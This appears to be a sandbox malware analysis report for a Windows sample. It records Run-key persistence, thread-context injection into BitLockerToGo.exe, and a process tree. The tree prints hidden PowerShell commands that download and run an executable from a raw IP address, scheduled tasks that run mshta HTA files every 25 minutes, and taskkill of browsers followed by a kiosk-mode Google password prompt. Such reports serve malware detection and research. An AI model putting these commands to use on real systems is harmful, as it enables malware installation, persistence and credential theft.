| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\be9629c306.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\be9629c306.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22e7923b7d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\22e7923b7d.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd3907672e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\dd3907672e.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\EX0eXUWS\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e3d77cfb89.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\e3d77cfb89.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1590993906.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\1590993906.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3988 set thread context of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe | C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe |
| PID 1200 set thread context of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 628 set thread context of 2568 | N/A | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 5796 set thread context of 6024 | N/A | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe |
| PID 1212 set thread context of 3340 | N/A | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\bcngpqs\ovql.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857006042876473" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe
"C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe
"C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 6QKiRmaQMTY /tr "mshta C:\Users\Admin\AppData\Local\Temp\kao0wjnJg.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE
"C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "qUdp4ma4jJN" /tr "mshta \"C:\Temp\m9sy3Qpjo.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\m9sy3Qpjo.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe
"C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3988 -ip 3988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 820
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe
"C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe"
C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe
"C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe
"C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe"
C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe
"C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe"
C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe
"C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe"
C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe
"C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d71a98c4-74cc-46cd-842d-20a1d41903dd} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2460 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ded5e7-249f-4225-a06d-b43d3c6e32a6} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" socket
C:\ProgramData\bcngpqs\ovql.exe
C:\ProgramData\bcngpqs\ovql.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2748 -childID 1 -isForBrowser -prefsHandle 3336 -prefMapHandle 3332 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b799800d-a53d-4e03-8e01-3d4ccbe4ad86} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a48ff07e-8e66-48c4-848b-7362395d41a9} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4860 -prefMapHandle 4856 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {902c3cf2-b2a6-4cae-93a4-edc9461ec68f} 4428 "\\.\pipe\gecko-crash-server-pipe.4428" utility
C:\Program Files\Mozilla Firefox\firefox.exe
